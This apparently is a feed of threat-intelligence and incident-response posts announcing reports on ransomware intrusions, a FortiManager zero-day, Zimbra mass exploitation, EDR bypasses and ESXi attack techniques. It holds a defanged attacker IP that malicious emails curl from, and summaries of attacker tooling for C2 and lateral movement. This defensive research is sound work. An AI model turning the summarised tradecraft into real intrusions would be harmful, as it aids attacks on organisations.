Excited to announce the 🚀 launch of the 🔥 LOLESXi project. It provides valuable insights into adversarial techniques targeting VMWARE ESXi. lolesxi-project.github.io/LOLESXi/ #threatresearch #lolesxi #dfir

Our latest report is live! The team put in incredible efforts breaking down the TTPs. Give it a read and prepare your hunts! Hope you find it valuable 😉 #DFIR #BlackCatRansomware

If you're using Zimbra, mass-exploitation of CVE-2024-45519 has begun. Patch yesterday. Malicious emails are coming from 79.124.49[.]86 and attempting to curl a file from that IP.

🍎🗒️ New macOS persistence is out! ➡ The launchd embedded plist. Thanks @byaaaaahhh for the idea. theevilbit.github.io/beyond/beyond_…

2024-10-09 (Wednesday): We continue to see #malware pushing #LummaStealer from fake (#typosquatted) websites impersonating legitimate software vendors. More information at: bit.ly/4h34dP2

🚨 Breaking: A zero-day vulnerability (CVE-2024-47575) has been observed impacting Fortinet FortiManager devices, posing serious risks. Learn how the exploit works, and how to defend against the threat. Read more -> bit.ly/4hbqmuR #ThreatIntelligence

Juicy intel stuff 🔥

I recently co-authored a Unit 42 blog about a unique IR case in which a threat actor’s custom EDR bypass (using #BYOVD) exposed their toolkit, methods, and even identity. Check out how we unmasked them through an opsec slip-up! #dfir unit42.paloaltonetworks.com/edr-bypass-ext…

The most bizarre coding interview I've ever done was at Facebook when as usual I asked a candidate to write in any language of their choice.. And they nonchalantly said "I'll write it in SQL", to which I almost let loose a chuckle until...

Nasreddine Bencherchali 🤦‍♂️ Thanks.

Unit 42 just dropped an awesome blog about LDAP detection used by different adversaries. Pretty awesome to see a shoutout to our Dagon Locker report from The DFIR Report, which we published a few months back. #dfir unit42.paloaltonetworks.com/lightweight-di…

North Korean IT Workers Conducting Data Extortion. Insider Threat. ic3.gov/PSA/2025/PSA25…

This is my first blog for this year, and excited to kick off 2025 with the release of our first The DFIR Report 's post regarding "Cobalt Strike and a Pair of Socks Lead to LockBit Ransomware." Look at how Lockbit leverages GhostSOCKS and SystemBC as part of its persistence,

PYSA/Mespinoza Ransomware ➡️TTR 7.5 hours ➡️Koadic and Empire for C2 ➡️7+ Credential Access techniques ➡️ADRecon, APS, quser, arp, and nltest for Discovery ➡️RDP and PsExec for Lateral Movement ➡️Files exfiltrated ➡️PYSA ransomware for Impact Report link ⬇️

By making minor changes to command-line arguments, it is possible to bypass EDR/AV detections. My research, comprising ~70 Windows executables, found that all of them were vulnerable to this, to varying degrees. Here’s what I found and why it matters 👉 wietze.github.io/blog/bypassing…

thedfirreport.com/2025/05/19/ano… It was a lot of fun working on this report with bsky.app/profile/did:pl… and x.com/0xtornado Tornado - we came up with a new Sigma detection for Impacket tools that I hope you will find useful for #threathunting

🌟New report out today!🌟 Another Confluence Bites the Dust: Falling to ELPACO-team Ransomware Analysis and reporting completed by @pcsc0ut.bsky.social, @irishdeath.bsky.social & Tornado 🔊Audio: Available on Spotify, Apple, YouTube and more! thedfirreport.com/2025/05/19/ano…

🌟New report out today!🌟 Hide Your RDP: Password Spray Leads to RansomHub Deployment Analysis and reporting completed by [email protected], Aleks and UC2 🔊Audio: Available on Spotify, Apple, YouTube and more! thedfirreport.com/2025/06/30/hid…